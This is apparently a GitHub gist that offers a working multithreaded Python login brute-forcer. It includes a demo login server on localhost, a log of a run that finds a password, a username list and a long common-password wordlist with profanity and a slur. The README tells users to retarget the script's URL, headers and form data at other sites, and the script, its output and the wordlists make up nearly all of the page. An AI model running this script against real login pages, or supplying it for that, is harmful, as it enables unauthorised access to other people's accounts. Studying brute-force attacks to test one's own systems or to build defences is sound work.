Skip to content

Instantly share code, notes, and snippets.

@ezra100

ezra100/!README.md

Last active February 9, 2022 13:07
Show Gist options
  • Save ezra100/384db8f10f079055894509b324b94efd to your computer and use it in GitHub Desktop.
Save ezra100/384db8f10f079055894509b324b94efd to your computer and use it in GitHub Desktop.
Download ZIP
Python Brute-Force with Multiple Threads
Raw
!README.md

Python Brute-Force with Multiple Threads

Below there's a sample code of how to run a brute force with multiple thread in python.

Content

  • brute.py - the main code, change url, headers, data, etc. depending on the target
  • server.py - a demo login-server
  • demo.log - output of the demo (running brute.py while server.py is running)
  • z.names and z.passwords the username and passwords lists used for the demo (starting with z for gist file order)
Raw
brute.py
import logging
import concurrent.futures as ft
import requests
from requests import Response
from typing import Any, List
from http import HTTPStatus
import sys
from datetime import datetime
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO,
datefmt='%H:%M:%S'
)
THREADS = 10
URL = "http://localhost:8080"
HEADERS = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv: 78.0) Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded',
}
DATA_FORMAT = 'username={username}&password={pwd}'
def is_authorized(resp: Response):
return resp.status_code != HTTPStatus.UNAUTHORIZED
def request(username: str, pwd: str, did_succeed_func= is_authorized):
data = DATA_FORMAT.format(username = username, pwd = pwd)
resp = requests.post(URL,data=data, headers= HEADERS, allow_redirects=False)
try:
success = did_succeed_func(resp)
if not success:
return False
except:
pass
return (username,pwd)
BATCH_SIZE = 100
def shutdown_executor(executor: ft.ThreadPoolExecutor, futures:List[ft.Future] ):
if sys.version_info.minor >= 9:
executor.shutdown(wait=False, cancel_futures=True)
else:
for f in futures:
f.cancel()
executor.shutdown(wait=False)
def brute_force(usernames: List[str], passwords: List[str]):
with ft.ThreadPoolExecutor(max_workers=THREADS) as executor:
brute_futures_map = {executor.submit(request, username, pwd):(username,pwd) for pwd in passwords for username in usernames}
batch_start = datetime.now()
logging.info("starting")
# please note that the order of the completed futures mey be a bit different than
# the order of submitted futures
for i,ftr in enumerate(ft.as_completed(brute_futures_map)):
try:
if i% BATCH_SIZE == 0 and i > 0:
record = brute_futures_map[ftr]
log_batch(batch_start, i, record)
results = ftr.result()
if results != False:
print(f"found {results}, exiting")
shutdown_executor(executor, brute_futures_map)
break
except Exception as e:
logging.exception(e)
def log_batch(batch_start, i, record):
batch_end = datetime.now()
batch_timing = (batch_end-batch_start).total_seconds()
logging.info(f"reached #{i} ({batch_timing:.3} secs) {record}")
batch_start=batch_end
def file_to_list(filename: str):
with open(filename, "r") as f:
return f.read().strip().split("\n")
passwords_filename = "z.passwords"
users_filename = "z.names"
def main():
wordlist = file_to_list(passwords_filename)
users = file_to_list(users_filename)
brute_force(users,wordlist)
if __name__ == "__main__":
main()
Raw
demo.log
14:50:54 - root - INFO - starting
14:50:54 - root - INFO - reached #100 (0.161 secs) ('admin', '2000')
14:50:54 - root - INFO - reached #200 (0.378 secs) ('administrator', 'hockey')
14:50:55 - root - INFO - reached #300 (0.679 secs) ('ross', 'dallas')
14:50:55 - root - INFO - reached #400 (0.96 secs) ('ross', 'taylor')
14:50:55 - root - INFO - reached #500 (1.19 secs) ('ross', 'cowboy')
14:50:56 - root - INFO - reached #600 (1.46 secs) ('administrator', 'justin')
14:50:56 - root - INFO - reached #700 (1.67 secs) ('jake', 'please')
14:50:56 - root - INFO - reached #800 (1.89 secs) ('root', 'charles')
14:50:56 - root - INFO - reached #900 (2.15 secs) ('root', 'yamaha')
14:50:57 - root - INFO - reached #1000 (2.44 secs) ('ross', 'chester')
14:50:57 - root - INFO - reached #1100 (2.79 secs) ('ross', 'mother')
14:50:57 - root - INFO - reached #1200 (3.05 secs) ('root', 'carlos')
14:50:57 - root - INFO - reached #1300 (3.25 secs) ('jake', 'jackie')
14:50:58 - root - INFO - reached #1400 (3.47 secs) ('admin', 'mountain')
14:50:58 - root - INFO - reached #1500 (3.95 secs) ('root', 'fred')
14:50:58 - root - INFO - reached #1600 (4.33 secs) ('root', 'stupid')
14:50:59 - root - INFO - reached #1700 (4.59 secs) ('jake', 'dolphin')
14:50:59 - root - INFO - reached #1800 (4.77 secs) ('jake', 'apple')
14:50:59 - root - INFO - reached #1900 (4.95 secs) ('jake', 'scorpion')
14:50:59 - root - INFO - reached #2000 (5.18 secs) ('administrator', 'arthur')
14:50:59 - root - INFO - reached #2100 (5.42 secs) ('jake', 'frank')
found ('jake', 'garfield'), exiting
Raw
server.py
from http.server import BaseHTTPRequestHandler
from http import HTTPStatus
import socketserver
from urllib.parse import parse_qs
PORT = 8080
user_pass_list = [
('jake', 'garfield')
]
class HTTPLoginHandler(BaseHTTPRequestHandler):
def __init__(self, *args,**kwargs):
super().__init__(*args, **kwargs)
def do_GET(self):
"""Serve a GET request."""
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
message = "POST requests only!"
self.wfile.write(bytes(message, "utf8"))
def do_POST(self):
length = int(self.headers.get('content-length'))
field_data = self.rfile.read(length)
bytes_fields = parse_qs(field_data)
fields = {key.decode():val[0].decode() for key,val in bytes_fields.items()}
username = fields.get("username")
pwd = fields.get("password")
resp = ""
status = HTTPStatus.UNAUTHORIZED
resp = "wrong username or password"
if (username, pwd) in user_pass_list:
status = HTTPStatus.OK
resp = "success"
self.send_response(status)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(resp.encode())
with socketserver.TCPServer(("", PORT), HTTPLoginHandler) as httpd:
print("serving at port", PORT)
httpd.serve_forever()
Raw
z.names
jake
root
admin
administrator
ross
Raw
z.passwords
password
123456
12345678
1234
qwerty
12345
dragon
pussy
baseball
football
letmein
monkey
696969
abc123
mustang
michael
shadow
master
jennifer
111111
2000
jordan
superman
harley
1234567
fuckme
hunter
fuckyou
trustno1
ranger
buster
thomas
tigger
robert
soccer
fuck
batman
test
pass
killer
hockey
george
charlie
andrew
michelle
love
sunshine
jessica
asshole
6969
pepper
daniel
access
123456789
654321
joshua
maggie
starwars
silver
william
dallas
yankees
123123
ashley
666666
hello
amanda
orange
biteme
freedom
computer
sexy
thunder
nicole
ginger
heather
hammer
summer
corvette
taylor
fucker
austin
1111
merlin
matthew
121212
golfer
cheese
princess
martin
chelsea
patrick
richard
diamond
yellow
bigdog
secret
asdfgh
sparky
cowboy
camaro
anthony
matrix
falcon
iloveyou
bailey
guitar
jackson
purple
scooter
phoenix
aaaaaa
morgan
tigers
porsche
mickey
maverick
cookie
nascar
peanut
justin
131313
money
horny
samantha
panties
steelers
joseph
snoopy
boomer
whatever
iceman
smokey
gateway
dakota
cowboys
eagles
chicken
dick
black
zxcvbn
please
andrea
ferrari
knight
hardcore
melissa
compaq
coffee
booboo
bitch
johnny
bulldog
xxxxxx
welcome
james
player
ncc1701
wizard
scooby
charles
junior
internet
bigdick
mike
brandy
tennis
blowjob
banana
monster
spider
lakers
miller
rabbit
enter
mercedes
brandon
steven
fender
john
yamaha
diablo
chris
boston
tiger
marine
chicago
rangers
gandalf
winter
bigtits
barney
edward
raiders
porn
badboy
blowme
spanky
bigdaddy
johnson
chester
london
midnight
blue
fishing
000000
hannah
slayer
11111111
rachel
sexsex
redsox
thx1138
asdf
marlboro
panther
zxcvbnm
arsenal
oliver
qazwsx
mother
victoria
7777777
jasper
angel
david
winner
crystal
golden
butthead
viking
jack
iwantu
shannon
murphy
angels
prince
cameron
girls
madison
wilson
carlos
hooters
willie
startrek
captain
maddog
jasmine
butter
booger
angela
golf
lauren
rocket
tiffany
theman
dennis
liverpoo
flower
forever
green
jackie
muffin
turtle
sophie
danielle
redskins
toyota
jason
sierra
winston
debbie
giants
packers
newyork
jeremy
casper
bubba
112233
sandra
lovers
mountain
united
cooper
driver
tucker
helpme
fucking
pookie
lucky
maxwell
8675309
bear
suckit
gators
5150
222222
shithead
fuckoff
jaguar
monica
fred
happy
hotdog
tits
gemini
lover
xxxxxxxx
777777
canada
nathan
victor
florida
88888888
nicholas
rosebud
metallic
doctor
trouble
success
stupid
tomcat
warrior
peaches
apples
fish
qwertyui
magic
buddy
dolphins
rainbow
gunner
987654
freddy
alexis
braves
cock
2112
1212
cocacola
xavier
dolphin
testing
bond007
member
calvin
voodoo
7777
samson
alex
apollo
fire
tester
walter
beavis
voyager
peter
porno
bonnie
rush2112
beer
apple
scorpio
jonathan
skippy
sydney
scott
red123
power
gordon
travis
beaver
star
jackass
flyers
boobs
232323
zzzzzz
steve
rebecca
scorpion
doggie
legend
ou812
yankee
blazer
bill
runner
birdie
bitches
555555
parker
topgun
asdfasdf
heaven
viper
animal
2222
bigboy
4444
arthur
baby
private
godzilla
donald
williams
lifehack
phantom
dave
rock
august
sammy
cool
brian
platinum
jake
bronco
paul
mark
frank
heka6w2
copper
billy
cumshot
garfield
willow
cunt
little
carter
slut
albert
69696969
kitten
super
jordan23
eagle1
shelby
america
11111
jessie
house
free
123321
chevy
bullshit
white
broncos
horney
surfer
nissan
999999
saturn
airborne
elephant
marvin
shit
action
adidas
qwert
kevin
1313
explorer
walker
police
christin
december
benjamin
wolf
sweet
therock
king
online
dickhead
brooklyn
teresa
cricket
sharon
dexter
racing
penis
gregory
0000
teens
redwings
dreams
michigan
hentai
magnum
87654321
nothing
donkey
trinity
digital
333333
stella
cartman
guinness
123abc
speedy
buffalo
kitty
pimpin
eagle
einstein
kelly
nelson
nirvana
vampire
xxxx
playboy
louise
pumpkin
snowball
test123
girl
sucker
mexico
beatles
fantasy
ford
gibson
celtic
marcus
cherry
cassie
888888
natasha
sniper
chance
genesis
hotrod
reddog
alexande
college
jester
passw0rd
bigcock
smith
lasvegas
carmen
slipknot
3333
death
kimberly
1q2w3e
eclipse
1q2w3e4r
stanley
samuel
drummer
homer
montana
music
aaaa
spencer
jimmy
carolina
colorado
creative
hello1
rocky
goober
friday
bollocks
scotty
abcdef
bubbles
hawaii
fluffy
mine
stephen
horses
thumper
5555
pussies
darkness
asdfghjk
pamela
boobies
buddha
vanessa
sandman
naughty
douglas
honda
matt
azerty
6666
shorty
money1
beach
loveme
4321
simple
poohbear
444444
badass
destiny
sarah
denise
vikings
lizard
melanie
assman
sabrina
nintendo
water
good
howard
time
123qwe
november
xxxxx
october
leather
bastard
young
101010
extreme
hard
password1
vincent
pussy1
lacrosse
hotmail
spooky
amateur
alaska
badger
paradise
maryjane
poop
crazy
mozart
video
russell
vagina
spitfire
anderson
norman
eric
cherokee
cougar
barbara
long
420420
family
horse
enigma
allison
raider
brazil
blonde
jones
55555
dude
drowssap
jeff
school
marshall
lovely
1qaz2wsx
jeffrey
caroline
franklin
booty
molly
snickers
leslie
nipples
courtney
diesel
rocks
eminem
westside
suzuki
daddy
passion
hummer
ladies
zachary
frankie
elvis
reggie
alpha
suckme
simpson
patricia
147147
pirate
tommy
semperfi
jupiter
redrum
freeuser
wanker
stinky
ducati
paris
natalie
babygirl
bishop
windows
spirit
pantera
monday
patches
brutus
houston
smooth
penguin
marley
forest
cream
212121
flash
maximus
nipple
bobby
bradley
vision
pokemon
champion
fireman
indian
softball
picard
system
clinton
cobra
enjoy
lucky1
claire
claudia
boogie
timothy
marines
security
dirty
admin
wildcats
pimp
dancer
hardon
veronica
fucked
abcd1234
abcdefg
ironman
wolverin
remember
great
freepass
bigred
squirt
justice
francis
hobbes
kermit
pearljam
mercury
domino
9999
denver
brooke
rascal
hitman
mistress
simon
tony
bbbbbb
friend
peekaboo
naked
budlight
electric
sluts
stargate
saints
bondage
brittany
bigman
zombie
swimming
duke
qwerty1
babes
scotland
disney
rooster
brenda
mookie
swordfis
candy
duncan
olivia
hunting
blink182
alicia
8888
samsung
bubba1
whore
virginia
general
passport
aaaaaaaa
erotic
liberty
arizona
jesus
abcd
newport
skipper
rolltide
balls
happy1
galore
christ
weasel
242424
wombat
digger
classic
bulldogs
poopoo
accord
popcorn
turkey
jenny
amber
bunny
mouse
007007
titanic
liverpool
dreamer
everton
friends
chevelle
carrie
gabriel
psycho
nemesis
burton
pontiac
connor
eatme
lickme
roland
cumming
mitchell
ireland
lincoln
arnold
spiderma
patriots
goblue
devils
eugene
empire
asdfg
cardinal
brown
shaggy
froggy
qwer
kawasaki
kodiak
people
phpbb
light
54321
kramer
chopper
hooker
honey
whynot
lesbian
lisa
baxter
adam
snake
teen
ncc1701d
qqqqqq
airplane
britney
avalon
sandy
sugar
sublime
stewart
wildcat
raven
scarface
elizabet
123654
trucks
wolfpack
pervert
lawrence
raymond
redhead
american
alyssa
bambam
movie
woody
shaved
snowman
tiger1
chicks
raptor
1969
stingray
shooter
france
stars
madmax
kristen
sports
jerry
789456
garcia
simpsons
lights
ryan
looking
chronic
alison
hahaha
packard
hendrix
perfect
service
spring
srinivas
spike
katie
252525
oscar
brother
bigmac
suck
single
cannon
georgia
popeye
tattoo
texas
party
bullet
taurus
sailor
wolves
panthers
japan
strike
flowers
pussycat
chris1
loverboy
berlin
sticky
marina
tarheels
fisher
russia
connie
wolfgang
testtest
mature
bass
catch22
juice
michael1
nigger
159753
women
alpha1
trooper
hawkeye
head
freaky
dodgers
pakistan
machine
pyramid
vegeta
katana
moose
tinker
coyote
infinity
inside
pepsi
letmein1
bang
control
hercules
morris
james1
tickle
outlaw
browns
billybob
pickle
test1
michele
antonio
sucks
pavilion
changeme
caesar
prelude
tanner
adrian
darkside
bowling
wutang
sunset
robbie
alabama
danger
zeppelin
juan
rusty
pppppp
nick
2001
ping
darkstar
madonna
qwe123
bigone
casino
cheryl
charlie1
mmmmmm
integra
wrangler
apache
tweety
qwerty12
bobafett
simone
none
business
sterling
trevor
transam
dustin
harvey
england
2323
seattle
ssssss
rose
harry
openup
pandora
pussys
trucker
wallace
indigo
storm
malibu
weed
review
babydoll
doggy
dilbert
pegasus
joker
catfish
flipper
valerie
herman
fuckit
detroit
kenneth
cheyenne
bruins
stacey
smoke
joey
seven
marino
fetish
xfiles
wonder
stinger
pizza
babe
pretty
stealth
manutd
gracie
gundam
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment